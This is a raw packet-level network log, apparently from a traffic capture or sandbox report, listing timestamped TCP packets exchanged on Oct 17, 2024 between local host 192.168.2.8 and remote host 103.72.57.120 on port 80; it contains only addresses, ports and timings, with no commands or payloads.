                                                    Oct 17, 2024 14:32:56.672446012 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672487974 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.672640085 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672696114 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.673321009 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.673333883 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.673376083 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.673465014 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.673475981 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.673522949 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.087208033 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087229967 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087241888 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087280035 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.087311983 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.087435961 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087454081 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087464094 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087475061 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087481976 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.087488890 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.087529898 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.088104010 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.088144064 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092225075 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092283964 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092345953 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092415094 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092722893 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092736006 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092772961 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092860937 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092873096 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092885971 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.092915058 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092950106 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.092995882 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.093008041 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.093044043 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.093595028 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.093641043 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.093643904 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.093657017 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.093688011 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.093707085 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.193631887 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.193736076 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.193806887 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.193820000 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.193856955 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.193883896 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.193892002 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.193903923 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.193962097 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.193975925 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.194022894 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194034100 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194045067 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194061995 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.194087982 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.194418907 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194447994 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194458008 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.194477081 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.194521904 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.195250034 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.195265055 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.195327997 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.195333958 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.195338964 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.195368052 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.195405960 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.312313080 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312391996 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312403917 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312407970 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.312452078 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.312632084 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312644958 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312655926 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.312685966 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.312719107 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.343898058 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.343916893 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.343929052 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.343935013 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.343991995 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344017029 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344078064 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.344130993 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344187975 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.344218969 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344249964 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344257116 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.344305038 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.344319105 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.344364882 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.345421076 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.345470905 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.345478058 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.345525980 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.359616041 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.359631062 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.359692097 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.432019949 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432038069 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432053089 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432060003 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432073116 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432095051 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432163000 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.432204008 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.432265043 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.468327999 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468349934 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468363047 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468430996 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468445063 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468514919 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468527079 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468533993 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.468542099 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.468597889 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.468612909 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.479063034 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.479104042 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.479115963 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.479183912 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.479237080 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.550745964 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.550849915 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.550862074 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.550872087 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.550880909 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.550890923 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.550956964 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.551001072 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.563035965 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.563169003 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.563245058 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.563296080 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.587795973 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.587816954 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.587830067 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.587873936 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.587909937 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.587970972 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.587987900 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.588001966 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.588018894 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.588038921 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.588052034 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.588057041 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.588097095 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.598325968 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.598362923 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.598376036 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.598424911 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.598470926 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.669804096 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.669823885 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.669836998 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.669850111 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.669861078 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.669898033 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.670273066 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.670336008 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.683826923 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.683842897 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.683856010 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.683897018 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.683942080 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.707928896 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.707942963 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.707953930 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.707993984 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708040953 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708066940 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708117008 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708133936 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708144903 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708184004 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708450079 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708493948 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708497047 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708507061 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.708539009 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.708554029 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.717593908 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.717660904 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.717705011 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.717715979 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.717746019 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.717763901 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.717775106 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.717833042 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.790443897 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.790463924 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.790477991 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.790561914 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.804661989 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.804682016 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.804692030 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.804747105 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.804786921 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830130100 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830159903 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830171108 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830228090 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830257893 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830305099 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830357075 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830358982 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830372095 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830404043 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830423117 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830492020 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830504894 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.830533981 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.830554962 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.831012011 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.831062078 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.831077099 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.831089973 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.831125975 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.840640068 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.840677977 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.840739012 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.840775967 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.882477045 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.882613897 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.882673979 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.882729053 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.911011934 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.911026955 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.911039114 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.911081076 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.911144018 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.924361944 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.924380064 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.924392939 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.924462080 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.950632095 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950658083 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950669050 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950681925 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950733900 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950747013 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.950794935 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.950824976 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.951323986 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951337099 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951349020 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951380968 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.951402903 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.951416969 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951432943 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951443911 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.951477051 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.951508999 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:57.999541044 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.999552965 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:57.999650955 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.030045986 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030066967 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030076981 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030124903 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.030150890 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.030179024 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030193090 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030204058 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.030230999 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.030267954 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.043504953 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.043528080 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.043544054 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.043611050 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.043648005 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.069787979 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.069808006 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.069823027 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.069933891 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.069961071 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.069979906 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070017099 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.070087910 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070096970 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.070105076 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070122004 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070138931 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070142031 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.070173979 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.070213079 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.070902109 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.070975065 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.071546078 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.071602106 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.149049044 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149077892 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149094105 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149184942 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.149220943 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149235010 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.149266958 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.149271011 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149286032 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.149315119 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.149333954 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.173482895 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.173547983 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.173563004 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.173635960 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.173676968 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189524889 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189539909 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189554930 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189584970 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189616919 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189675093 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189723969 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189750910 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189774036 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189790010 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189799070 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189805031 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.189841986 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.189867020 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.190433025 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.190488100 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:58.190634012 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.190646887 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.190671921 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:58.190686941 CEST8058046103.72.57.120192.168.2.8
